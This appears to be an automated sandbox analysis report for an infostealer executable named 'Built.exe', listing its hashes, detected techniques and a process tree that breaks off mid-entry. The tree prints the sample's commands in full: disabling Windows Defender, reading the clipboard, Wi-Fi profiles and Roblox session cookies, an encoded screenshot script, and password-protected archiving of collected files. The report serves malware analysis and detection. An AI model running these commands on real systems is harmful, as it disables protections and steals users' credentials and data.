Resubmissions

04-11-2024 04:01

241104-elnz2awkfn 10

04-11-2024 03:58

241104-ej1k2swkcq 10

04-11-2024 02:54

241104-dd8tsssdjl 10

04-11-2024 02:28

241104-cx4ths1gqr 10

04-11-2024 01:59

241104-cec8va1cqp 10

03-11-2024 22:14

241103-15y51avncw 10

03-11-2024 20:45

241103-zj6saavbqr 10

03-11-2024 19:51

241103-yk91nasfra 10

03-11-2024 19:38

241103-yct98ssdmd 10

03-11-2024 13:00

241103-p818zsvbqg 10

Analysis

  • max time kernel
    149s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-11-2024 02:28

General

  • Target

    Built.exe

  • Size

    6.9MB

  • MD5

    8a58a903d1863c9e42266e3b668214aa

  • SHA1

    d00001e87ac7b354d995671999a1e71ad3a8a6b1

  • SHA256

    bef60a4036fc03d017eb53212012d33f79a1c529f1ffa60cf83745271472e103

  • SHA512

    5aa75b2d1421df6dbc95adc2040f8c3b462cc78656d2be4175b8feb44409668d2dff367de11ebec050660a098e77f89e87e91d0786c385a77008b2250b57408b

  • SSDEEP

    98304:kVpTDjWM8JEE1FKamaHl3Ne4i3Tf2PkOpfW9hZMMoVmkzhxIdfXeRpYRJJcGhEIs:OT0heNTfm/pf+xk4dWRpmrbW3jmr2

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • UPX packed file 60 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Built.exe
    "C:\Users\Admin\AppData\Local\Temp\Built.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3648
    • C:\Users\Admin\AppData\Local\Temp\Built.exe
      "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4980
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4128
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1560
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3224
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2612
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:840
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1660
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4764
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1312
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2152
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:936
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2248
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3092
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Clipboard Data
        • Suspicious use of WriteProcessMemory
        PID:4156
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Clipboard Data
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4976
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4888
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:3268
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1760
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:3692
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:2488
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:1768
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2436
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:3704
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2328
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
            4⤵
              PID:2200
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4780
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4192
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n55onvym\n55onvym.cmdline"
                5⤵
                  PID:2768
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC7A5.tmp" "c:\Users\Admin\AppData\Local\Temp\n55onvym\CSCB9F91551B7E1471FA8707335FA421B.TMP"
                    6⤵
                      PID:2404
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2756
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:5096
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1956
                  • C:\Windows\system32\attrib.exe
                    attrib -r C:\Windows\System32\drivers\etc\hosts
                    4⤵
                    • Drops file in Drivers directory
                    • Views/modifies file attributes
                    PID:5016
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                    PID:1656
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:3032
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                      3⤵
                        PID:1648
                        • C:\Windows\system32\attrib.exe
                          attrib +r C:\Windows\System32\drivers\etc\hosts
                          4⤵
                          • Drops file in Drivers directory
                          • Views/modifies file attributes
                          PID:4288
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        3⤵
                          PID:1080
                          • C:\Windows\system32\tree.com
                            tree /A /F
                            4⤵
                              PID:4292
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                            3⤵
                              PID:4912
                              • C:\Windows\system32\tasklist.exe
                                tasklist /FO LIST
                                4⤵
                                • Enumerates processes with tasklist
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3896
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                              3⤵
                                PID:1980
                                • C:\Windows\system32\tree.com
                                  tree /A /F
                                  4⤵
                                    PID:4908
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  3⤵
                                    PID:4144
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      4⤵
                                        PID:3920
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                      3⤵
                                        PID:4792
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2672
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "getmac"
                                        3⤵
                                          PID:444
                                          • C:\Windows\system32\getmac.exe
                                            getmac
                                            4⤵
                                              PID:1520
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                            3⤵
                                              PID:3504
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                4⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4568
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI36482\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\USomo.zip" *"
                                              3⤵
                                                PID:4820
                                                • C:\Users\Admin\AppData\Local\Temp\_MEI36482\rar.exe
                                                  C:\Users\Admin\AppData\Local\Temp\_MEI36482\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\USomo.zip" *
                                                  4⤵
                                                  • Executes dropped EXE
                                                  PID:2084
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                3⤵
                                                  PID:4488
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic os get Caption
                                                    4⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4348
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                  3⤵
                                                    PID:2332
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic computersystem get totalphysicalmemory
                                                      4⤵
                                                        PID:2892
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                      3⤵
                                                        PID:3720
                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                          wmic csproduct get uuid
                                                          4⤵
                                                            PID:1432
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                          3⤵
                                                            PID:4472
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                              4⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:4224
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                            3⤵
                                                              PID:628
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic path win32_VideoController get name
                                                                4⤵
                                                                • Detects videocard installed
                                                                PID:4740
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                              3⤵
                                                                PID:460
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
